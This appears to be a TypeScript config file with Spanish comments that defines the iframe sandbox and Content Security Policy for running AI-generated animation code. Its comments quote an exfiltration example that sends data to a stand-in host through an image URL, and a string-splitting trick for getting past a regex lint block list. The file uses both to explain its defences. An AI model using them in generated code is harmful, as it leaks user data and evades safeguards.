// ─── El aislamiento del iframe de una animación por código ───────────────────
// Mismo criterio, y mismos motivos, que `chat-atlas/documentoGrafico.ts` (leé el
// bloque grande de ese archivo: todo aplica acá). La diferencia es que este
// documento no es un `srcdoc` con HTML del modelo sino una PÁGINA NUESTRA
// (`/sandbox/animacion.html`, compilada por Vite) que adentro ejecuta el código
// del modelo con Babel + `new Function`. Por eso la CSP se parece pero no es la
// misma:
//   • `script-src 'self' 'unsafe-eval'`: el bundle del sandbox es nuestro (self) y
//     Babel + `new Function` necesitan eval. Sin `'unsafe-inline'`: ningún script
//     inline, ni del modelo ni nuestro.
//   • `img-src <nuestro Storage> data: blob:`: las fotos del producto y el logo
//     son URLs firmadas de NUESTRO proyecto de Supabase; las capturas, data URLs.
//     Una imagen ES un canal de salida (`<Img src={"https://malo/?" + datos}>`),
//     por eso no es `https:` a secas, y tampoco `*.supabase.co`: ese comodín deja
//     mandar las URLs firmadas (que son credenciales al portador) a un proyecto
//     de Supabase de cualquiera. El host exacto sale de `VITE_SUPABASE_URL`, que
//     Vite reemplaza en el HTML al servirlo y al compilarlo (`%VITE_SUPABASE_URL%`,
//     ver `ORIGEN_STORAGE`). El lint (`PROHIBIDOS`) NO es la barrera: es regex y
//     `globalThis["fe" + "tch"]` lo saltea (hallazgo de Greptile, PR #139).
//   • `connect-src <nuestro Storage> https://fonts.googleapis.com
//     https://fonts.gstatic.com`: NO es `'none'` como en el visor gráfico porque
//     las capturas (html-to-image) tienen que bajar las imágenes y las fuentes
//     para incrustarlas en el PNG; sin eso el agente vería cajas vacías y la
//     tipografía de fallback. Son los mismos tres hosts que ya pueden cargar
//     imágenes y fuentes: no se abre ningún destino nuevo.
//   • `font-src https://fonts.gstatic.com`: las 50 fuentes del catálogo.
//   • `style-src 'unsafe-inline' https://fonts.googleapis.com`: los estilos son
//     inline (JSX) y las fuentes son hojas de Google.
//
// Con `sandbox="allow-scripts"` a secas el documento vive en origen opaco: no ve
// `localStorage` (donde está el token de Supabase), ni cookies, ni la ventana de
// arriba. NUNCA `allow-same-origin`: ver `documentoGrafico.ts`, punto 2.

/** El ÚNICO valor válido del atributo `sandbox` del iframe de una animación. */
export const SANDBOX_ANIMACION = 'allow-scripts';

/** Los tokens que jamás pueden aparecer. Mismos que los del visor gráfico. */
export const SANDBOX_ANIMACION_PROHIBIDOS = [
  'allow-same-origin',
  'allow-top-navigation',
  'allow-top-navigation-by-user-activation',
  'allow-popups',
  'allow-popups-to-escape-sandbox',
  'allow-forms',
  'allow-modals',
  'allow-downloads',
  'allow-pointer-lock',
  'allow-presentation',
  'allow-storage-access-by-user-activation',
] as const;

/**
 * El origen de NUESTRO Storage, como lo escribe la CSP del `<meta>`. Es el
 * placeholder de entorno de Vite: al servir (dev) y al compilar (build) cada
 * HTML, `%VITE_SUPABASE_URL%` se reemplaza por el valor del `.env`
 * (`https://<ref>.supabase.co`, el mismo host de las URLs firmadas que llegan en
 * `props.assets`). Si la variable faltara, queda el texto literal: una fuente
 * inválida que el navegador ignora, o sea que falla CERRADO (no cargan las
 * fotos), nunca abierto. Nunca `*.supabase.co`.
 */
export const ORIGEN_STORAGE = '%VITE_SUPABASE_URL%';

/** Directivas de la CSP del documento del sandbox (va en su `<meta>`). */
export const DIRECTIVAS_CSP_ANIMACION = [
  "default-src 'none'",
  "script-src 'self' 'unsafe-eval'",
  "style-src 'unsafe-inline' https://fonts.googleapis.com",
  `img-src ${ORIGEN_STORAGE} data: blob:`,
  'font-src https://fonts.gstatic.com data:',
  `connect-src ${ORIGEN_STORAGE} https://fonts.googleapis.com https://fonts.gstatic.com`,
  "media-src 'none'",
  "object-src 'none'",
  "frame-src 'none'",
  "child-src 'none'",
  "worker-src 'none'",
  "manifest-src 'none'",
  "form-action 'none'",
  "base-uri 'none'",
  "webrtc 'block'",
] as const;

export const CSP_ANIMACION = DIRECTIVAS_CSP_ANIMACION.join('; ');

/** La ruta de la página del sandbox (entrada aparte de Vite). */
export const RUTA_SANDBOX_ANIMACION = '/sandbox/animacion.html';
